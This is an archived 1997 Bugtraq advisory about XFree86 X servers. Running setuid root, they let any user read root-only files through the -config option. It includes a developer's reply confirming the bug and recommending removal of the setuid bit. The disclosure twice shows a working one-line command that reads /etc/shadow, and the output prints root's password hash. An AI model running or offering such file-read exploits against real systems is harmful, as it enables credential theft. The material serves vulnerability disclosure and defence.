XFree86 (and apparently other X11R6 XC/TOG derived servers) -config insecurity

Summary
Description:XFree86 is setuid root in many cases and takes a -config option to use a different config file. Unfortunately it doesn't check permissions on this file so you can (for example) read the first line of /etc/shadow (printed in the warning message)
Author:plaguez <dube0866@eurobretagne.fr>
Compromise:Read files that you shouldn't have permissions for
Vulnerable Systems:Those with a suid root XFree86 X server as well as some other X servers. This affects many Linux (and probably FreeBSD/OpenBSD)boxes.
Date:21 November 1997
Details


Date: Fri, 21 Nov 1997 18:35:36 +0000
From: shegget <root@SHEGG.RH1.IIT.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: XFree86 insecurity

                  plaguez security advisory n.10

                        XFree86 insecurity




Program:   XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)

Version:   Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2.
           Other versions as well.

OS:        All

Impact:    The XFree86 servers let you specify an alternate configuration
           file and do not check whether you have rights to read it.
           Any user can read files with root permissions.




hello,
just a short one to tell you about this "feature" I found in all default
XFree86 servers...


Here it is:

Script started on Sat Aug 23 15:32:36 1997
Loading /usr/lib/kbd/keytables/fr-latin1.map
[plaguez@plaguez plaguez]$ uname -a
Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
[plaguez@plaguez plaguez]$ ls -al /etc/shadow
-rw-------   1 root     bin          1039 Aug 21 20:12  /etc/shadow
[plaguez@plaguez bin]$ id
uid=502(plaguez) gid=500(users) groups=500(users)
[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
use: X [:<display>] [option]
-a #                   mouse acceleration (pixels)
-ac                    disable access control restrictions
-audit int             set audit trail level
-auth file             select authorization file
bc                     enable bug compatibility
-bs                    disable any backing store support
-c                     turns off key-click

... and so on.  HINT: look at the first XF86_SVGA output line.





Patch:
------

If you run xdm, you should consider removing the setuid bit of the
servers.

If not, well, wait for the XFree86 Project to bring you a patch, since I'm
too lazy to find and fix it.





later,

-plaguez
dube0866@eurobretagne.fr
Date: Sat, 22 Nov 1997 20:03:15 -0600
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: XFree86 insecurity

---------- Forwarded message ----------
Date: Sat, 22 Nov 1997 19:24:53 +1100
From: David Dawes <dawes@rf900.physics.usyd.edu.au>
To: Philippe Regnauld <regnauld@deepo.prosa.dk>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Fwd: "XFree86 insecurity" <root@SHEGG.RH1.IIT.EDU>

On Sat, Nov 22, 1997 at 08:23:50AM +0100, Philippe Regnauld wrote:

We (XFree86) are aware of this one.  I agree with the recomendation of
removing the setuid bit and using xdm to start the Xserver, and if you
have XFree86 on a machine where this problem is significant, you should
consider doing this.

The fix is to disable the '-config' Xserver option.  This will be removed
in our next release, and also in the next X11 release from The Open
Group.  It was only added to get around problems on OS's with small
command line length limits, and should never have been enabled for most
Unix-like OSs.  The problem isn't XFree86-specific.  It affects any
platform using X11R6 XC/TOG code where the Xserver is installed setuid
root (although on non-XFree86 platforms you may need to be a little more
inventive with the use of the -config option).

David

>Cute one.
>
>-----Forwarded message from shegget <root@SHEGG.RH1.IIT.EDU>-----
>
>Date:         Fri, 21 Nov 1997 18:35:36 +0000
>From: shegget <root@SHEGG.RH1.IIT.EDU>
>Subject:      XFree86 insecurity
>To: BUGTRAQ@NETSPACE.ORG
>
>                  plaguez security advisory n.10
>
>                        XFree86 insecurity
>
>
>
>
>Program:   XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)
>
>Version:   Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2.
>           Other versions as well.
>
>OS:        All
>
>Impact:    The XFree86 servers let you specify an alternate configuration
>           file and do not check whether you have rights to read it.
>           Any user can read files with root permissions.
>
>
>
>
>hello,
>just a short one to tell you about this "feature" I found in all default
>XFree86 servers...
>
>
>Here it is:
>
>Script started on Sat Aug 23 15:32:36 1997
>Loading /usr/lib/kbd/keytables/fr-latin1.map
>[plaguez@plaguez plaguez]$ uname -a
>Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
>[plaguez@plaguez plaguez]$ ls -al /etc/shadow
>-rw-------   1 root     bin          1039 Aug 21 20:12  /etc/shadow
>[plaguez@plaguez bin]$ id
>uid=502(plaguez) gid=500(users) groups=500(users)
>[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
>[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
>Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
>use: X [:<display>] [option]
>-a #                   mouse acceleration (pixels)
>-ac                    disable access control restrictions
>-audit int             set audit trail level
>-auth file             select authorization file
>bc                     enable bug compatibility
>-bs                    disable any backing store support
>-c                     turns off key-click
>
>... and so on.  HINT: look at the first XF86_SVGA output line.
>
>
>
>
>
>Patch:
>------
>
>If you run xdm, you should consider removing the setuid bit of the
>servers.
>
>If not, well, wait for the XFree86 Project to bring you a patch, since I'm
>too lazy to find and fix it.
>
>
>
>
>
>later,
>
>-plaguez
>dube0866@eurobretagne.fr
>
>-----End of forwarded message-----
>
>--
>                                                              -- Phil
>
> -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: